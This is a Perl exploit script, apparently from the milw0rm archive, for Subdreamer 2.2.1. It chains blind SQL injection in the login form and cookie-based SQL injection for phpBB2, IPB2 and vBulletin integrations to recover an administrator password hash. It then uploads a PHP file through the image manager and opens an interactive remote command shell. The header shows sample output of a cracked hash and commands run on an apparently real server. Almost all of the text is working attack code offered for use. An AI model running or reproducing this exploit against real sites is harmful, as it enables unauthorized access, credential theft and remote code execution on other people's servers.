#!/usr/bin/perl ## Subdreamer 2.2.1 command exec exploit ## @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ ## supported targets: ## ~ without forum integration ## ~ with phpBB2 integration ## ~ with ipb2 integration ## ~ with vbulletin2 integration ## @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ ## based on RST/GHC advisory #35 ## http://rst.void.ru/papers/advisory35.txt ## @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ ## (c)oded by 1dt.w0lf - 19/09/2005 ## RST/GHC ## http://rst.void.ru ## http://ghc.ru ## @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ ## work: ## @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ ## r57subdreamer.pl -p http://subdreamer.com.ru/ -u 2 -t 1 ## ------------------------------------------------------------------ ## [~] PATH : http://subdreamer.com.ru/ ## [~] USER : 2 ## [~] TARGET : 1 - PhpBB2 ## [1] STEP 1 : TRY GET USER PASSWORD ## [~] SEARCHING PASSWORD ... [ DONE ] ## ----------------------------------------------------------- ## USER_ID: 2 ## PASS: 26310e438a5a1fb8622738f1e5d34f8b ## ----------------------------------------------------------- ## [2] STEP 2 : CHECK WHAT USER HAVE ACCESS TO ADMIN ZONE ## [+] DONE! THIS USER HAVE ACCESS! ## [3] STEP 3 : UPLOAD FILE ## [+] DONE! FILE "img.php" UPLOADED ## [+] WELL DONE! NOW YOU CAN EXECUTE COMMANDS! =) ## SUBDREAMER# id; uname -a; ls -la; ## ---------------------------------------------------------------- ## uid=1003(apache) gid=1003(apache) groups=1003(apache) ## FreeBSD customer-3314.cit-network.net 5.3-RELEASE FreeBSD 5.3-RELEASE #0: ## Fri Nov 5 04:19:18 UTC 2004 root@harlow.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC i386 ## total 24 ## drwxrwxrwx 5 enshteyn apache 512 Sep 19 23:04 . ## drwxr-x--- 10 enshteyn apache 512 Sep 17 21:03 .. ## drwxr-xr-x 2 enshteyn apache 512 Sep 10 14:09 Image ## -rw-r--r-- 1 apache apache 48 Sep 19 23:04 img.php ## drwxrwxrwx 2 enshteyn apache 512 Sep 10 14:09 logos ## drwxrwxrwx 2 enshteyn apache 512 Sep 10 14:09 smilies ## ---------------------------------------------------------------- ## SUBDREAMER# exit ## @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ ## config ## ------ ## ## images folder $img_folder = 'images'; ## or try ##$img_folder = 'images/logos'; ## ## end config use LWP::UserAgent; use HTTP::Cookies; use Getopt::Std; getopts('u:p:h:t:'); $path = $opt_p; $user = $opt_u; $hash = $opt_h; $target = $opt_t || 0; $s_num = 1; $|++; $n = 0; @targets = ( #['target name','colimn1 in database','colimn2 in database','cookie name 1','cookie name 2'] ['Subdreamer without forum','userid','password','sduserid','sdpassword'], ['PhpBB2','user_id','user_password','phpbb2mysql_data',''], ['IPB2','id','member_login_key','member_id','pass_hash'], ['PhpBB2 cookie injection','','','phpbb2mysql_data',''], ['IPB2 cookie injection','id','','member_id','pass_hash'], ['Vbulletin cookie injection','userid','','bbuserid','bbpassword'], ); if (!$path || !$user || $target<0 || $target>5) { &usage; } &head(); if($path=~/[^\/]$/) { $path .= '/'; } print "[~] PATH : $path\r\n"; print "[~] USER : $user\r\n"; print "[~] TARGET : $target - $targets[$target][0]\r\n"; if($target==1||$target==2||$target==0) { print "[1] STEP 1 : TRY GET USER PASSWORD\r\n"; if(!$hash){ print "[~] SEARCHING PASSWORD ... [|]"; FIND: while(1) { if(&found(47,58)==0) { &found(96,103); } $char = $i; if ($char=="0") { if(length($allchar) > 0){ print qq{\b\b DONE ] ----------------------------------------------------------- USER_ID: $user PASS: $allchar ----------------------------------------------------------- }; last FIND; } else { print "\b\b FAILED ]"; } exit(); } else { $allchar .= chr($char); } $s_num++; } } else { print "[~] SKIP. HASH EXISTS\r\n"; $allchar = $hash; } } print "[2] STEP 2 : CHECK WHAT USER HAVE ACCESS TO ADMIN ZONE\r\n"; if(&check_admin_rights()) { print "[+] DONE! THIS USER HAVE ACCESS!\r\n"; } else { print "[-] DAMN! THIS USER NOT ADMIN =(\r\n"; exit(); } print "[3] STEP 3 : UPLOAD FILE\r\n"; if(&upload_file()) { print "[+] DONE! FILE \"img.php\" UPLOADED\r\n"; } else { print "[-] DAMN! UPLOAD ERROR =(\r\n"; exit(); } print "[+] WELL DONE! NOW YOU CAN EXECUTE COMMANDS! =)\r\n"; while () { print "SUBDREAMER# "; while() { $cmd=$_; chomp($cmd); exit() if ($cmd eq 'exit'); last; } &run($cmd); } sub found($$) { my $fmin = $_[0]; my $fmax = $_[1]; if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; } $r = int($fmax - ($fmax-$fmin)/2); $check = " BETWEEN $r AND $fmax"; if ( &check($check) ) { &found($r,$fmax); } else { &found($fmin,$r); } } sub crack($$) { my $cmin = $_[0]; my $cmax = $_[1]; $i = $cmin; while ($i<$cmax) { $crcheck = "=$i"; if ( &check($crcheck) ) { return $i; } $i++; } $i = 0; return $i; } sub check($) { $n++; status(); $ccheck = $_[0]; $username = "no_such_user' OR (".$targets[$target][1]."=".$user." AND (ascii(substring(".$targets[$target][2].",".$s_num.",1))".$ccheck.")) /*"; $xpl = LWP::UserAgent->new() or die; $res = $xpl->post($path.'index.php', { "loginusername" => $username, "loginpassword" => "nap0Jlb_Haxep", "login" => "login", "Submit now" => "Login" } ); @results = $res->content; foreach $result(@results) { if ($result =~ /(Database error)|(Invalid SQL)/i) { print "\r\n[-] SQL SYNTAX ERROR! CHECK TARGET!\r\n"; exit(); } #print $result; # english pattern if ($result =~ /Wrong Password/) { return 1; } # russian pattern if ($result =~ /...... ......./) { return 1; } # russian pattern 2 if ($result =~ /............ ....../) { return 1; } # russian pattern 3 ( KOI8-R tested on subdreamer.com.ru ) if ($result =~ /...... ......./) { return 1; } } return 0; } sub status() { $status = $n % 5; if($status==0){ print "\b\b/]"; } if($status==1){ print "\b\b-]"; } if($status==2){ print "\b\b\\]"; } if($status==3){ print "\b\b|]"; } } sub check_admin_rights() { $xpl = LWP::UserAgent->new() or die; $cookie_jar = HTTP::Cookies->new( ); $xpl->cookie_jar( $cookie_jar ); ($host = $path) =~ s!http://([^/]*).*!$1!; if($target == 1) { # not default phpbb2 cookie, work for subdreamer.com.ru ... maybe default for subdreamer pro RU ??? #$cookie_jar->set_cookie( "0",$targets[$target][3], 'autologinid='.$allchar.'|userid='.$user,"/",$host,,,,,); # default phpbb2 cookie $cookie_jar->set_cookie( "0",$targets[$target][3],"a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A32%3A%22".$allchar."%22%3Bs%3A6%3A%22userid%22%3Bs%3A".length($user)."%3A%22".$user."%22%3B%7D","/",$host,,,,,); } elsif($target == 3) { # phpbb2 cookie with sql injection $cookie_jar->set_cookie( "0",$targets[$target][3],"a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A3%3A%22666%22%3Bs%3A6%3A%22userid%22%3Bs%3A".(length($user)+4)."%3A%22".$user."%27+%2F%2A%22%3B%7D","/",$host,,,,,); } elsif($target == 4) { # ipb2 cookie with sql injection $cookie_jar->set_cookie( "0",$targets[$target][3],"666\\","/",$host,,,,,); $cookie_jar->set_cookie( "1",$targets[$target][4],"/**/OR/**/".$targets[$target][2]."=".$user."","/",$host,,,,,); } elsif($target == 5) { # Vbulletin cookie with sql injection $cookie_jar->set_cookie( "0",$targets[$target][3],"666\\","/",$host,,,,,); $cookie_jar->set_cookie( "1",$targets[$target][4],"/**/OR/**/".$targets[$target][2]."=".$user."","/",$host,,,,,); } else { # subdreamer || ipb2 cookies $cookie_jar->set_cookie( "0",$targets[$target][3], $user,"/",$host,,,,,); $cookie_jar->set_cookie( "1",$targets[$target][4], $allchar,"/",$host,,,,,); } $res = $xpl->get($path."admin/index.php"); if($res->content =~ /loginpassword/) { return 0; } else { return 1; } } sub upload_file() { $xpl = LWP::UserAgent->new() or die; $cookie_jar = HTTP::Cookies->new( ); $xpl->cookie_jar( $cookie_jar ); ($host = $path) =~ s!http://([^/]*).*!$1!; if($target == 1) { # not default phpbb2 cookie, work for subdreamer.com.ru ... maybe default for subdreamer pro RU ??? #$cookie_jar->set_cookie( "0",$targets[$target][3], 'autologinid='.$allchar.'|userid='.$user,"/",$host,,,,,); # default phpbb2 cookie $cookie_jar->set_cookie( "0",$targets[$target][3],"a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A32%3A%22".$allchar."%22%3Bs%3A6%3A%22userid%22%3Bs%3A".length($user)."%3A%22".$user."%22%3B%7D","/",$host,,,,,); } elsif($target == 3) { # phpbb2 cookie with sql injection $cookie_jar->set_cookie( "0",$targets[$target][3],"a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A3%3A%22666%22%3Bs%3A6%3A%22userid%22%3Bs%3A".(length($user)+4)."%3A%22".$user."%27+%2F%2A%22%3B%7D","/",$host,,,,,); } elsif($target == 4) { # ipb2 cookie with sql injection $cookie_jar->set_cookie( "0",$targets[$target][3],"666\\","/",$host,,,,,); $cookie_jar->set_cookie( "1",$targets[$target][4],"/**/OR/**/".$targets[$target][2]."=".$user."","/",$host,,,,,); } elsif($target == 5) { # Vbulletin cookie with sql injection $cookie_jar->set_cookie( "0",$targets[$target][3],"666\\","/",$host,,,,,); $cookie_jar->set_cookie( "1",$targets[$target][4],"/**/OR/**/".$targets[$target][2]."=".$user."","/",$host,,,,,); } else { # subdreamer || ipb2 cookies $cookie_jar->set_cookie( "0",$targets[$target][3], $user,"/",$host,,,,,); $cookie_jar->set_cookie( "1",$targets[$target][4], $allchar,"/",$host,,,,,); } $res = $xpl->post($path.'admin/imagemanager.php',Content_Type => 'form-data', Content => [ 'action' => 'uploadimage', 'folderpath' => "../$img_folder/", 'MAX_FILE_SIZE' => '1000000', 'image' => [ undef, 'img.php', Content_type => 'text/plain', Content => '', ], 'submit' => 'Upload Image', ], ); if($res->content =~ /Settings Updated/) { return 1; } if($res->content =~ /Uploading Errors/) { return 0; } else { return 1; } } sub run() { $xpl = LWP::UserAgent->new() or die; $res = $xpl->post($path.$img_folder.'/img.php',{'cmd'=>$cmd}); print "----------------------------------------------------------------\r\n"; print $res->content; print "----------------------------------------------------------------\r\n"; } sub usage() { &head(); print q(| | | - Usage: | | r57subdreamer.pl -p -u [-t ] [-h ] | | - Path to subdreamer folder | | - User id for bruteforce | | - MD5 password hash for this user if you have it =\) | | - Available targets: | | - brute password: | | 0 - Subdreamer without forum integration ( default ) | | 1 - Subdreamer with PhpBB2 integration | | 2 - Subdreamer with IPB2 integration | | - cookie sql injection, dont need brute password: | | 3 - Subdreamer with PhpBB2 integration 2 | | 4 - Subdreamer with IPB2 integration 2 | | 5 - Subdreamer with Vbulletin integration | +--------------------------------------------------------------------+ | e.g.: | | r57subdreamer.pl -p http://127.0.0.1/subdreamer/ -u 1 | | r57subdreamer.pl -p http://www.subdreamer.com.ru -u 2 -t 1 | +--------------------------------------------------------------------+ | visit us: http://rst.void.ru , http://ghc.ru | +--------------------------------------------------------------------+ ); exit(); } sub head() { print q( +--------------------------------------------------------------------+ | Subdreamer version 2.2.1 sql injection + command execution exploit | | by 1dt.w0lf | | RST/GHC | +--------------------------------------------------------------------+ );} # milw0rm.com [2005-10-31]